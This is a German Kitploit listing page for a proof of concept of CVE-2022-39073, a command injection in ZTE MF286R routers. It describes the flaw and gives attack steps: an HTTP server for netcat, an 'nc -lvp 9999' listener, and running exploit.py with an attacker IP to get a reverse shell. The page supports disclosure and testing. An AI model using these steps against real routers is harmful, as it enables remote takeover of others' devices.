Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/v0lp3/cve-2022-39073
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-Tool
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

Proof-of-Concept für die Schwachstelle zur Befehlseinschleusung, die den ZTE MF286R Router betrifft, einschließlich eines RCE-Exploits.

Repository anzeigen
11412vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-39073

Firmware-Details:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

Voraussetzungen

  • requests (pip install requests)

Befehlseinschleusung

Die Sicherheitslücke ist eine gemeinsame Befehlseinschleusung zwischen der zte_net_link_detect-Binärdatei und dem WATCH_DOG_SWITCH-Handler im Webserver goahead-Binär.

Beachten Sie, dass die Sicherheitslücke nur ausgenutzt werden kann, wenn der Router mit dem WAN oder über eine SIM-Karte mit dem Internet verbunden ist. (Der Wert des Schlüssels "ppp_status" muss "ppp_connected" oder "ipv4_ipv6_connected" oder "ipv6_connected" sein).

Risiken

  • Remote-Code-Ausführung (RCE)
  • Beliebige Befehlsausführung

Machbarkeitsnachweis

Die Idee des Exploits besteht darin, das statische Netcat-Binär von einem HTTP-Server herunterzuladen und damit eine Reverse-Shell zu öffnen. P.S.: Das in diesem Ordner enthaltene Netcat ist Big Endian.

  • Öffnen Sie einen HTTP-Server in diesem Verzeichnis: python3 -m http.server 8080
  • Öffnen Sie einen Lausch-Socket auf Port 9999 mit nc -lvp 9999
  • Führen Sie das Skript in diesem Ordner aus: python3 exploit.py http://<router> <admin_password> <attacker_ip, z. B. 192.168.1.101>

Referenzen

Diese Sicherheitslücke wurde im September 2022 von Andrea Maugeri gemeldet. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

Tool herunterladen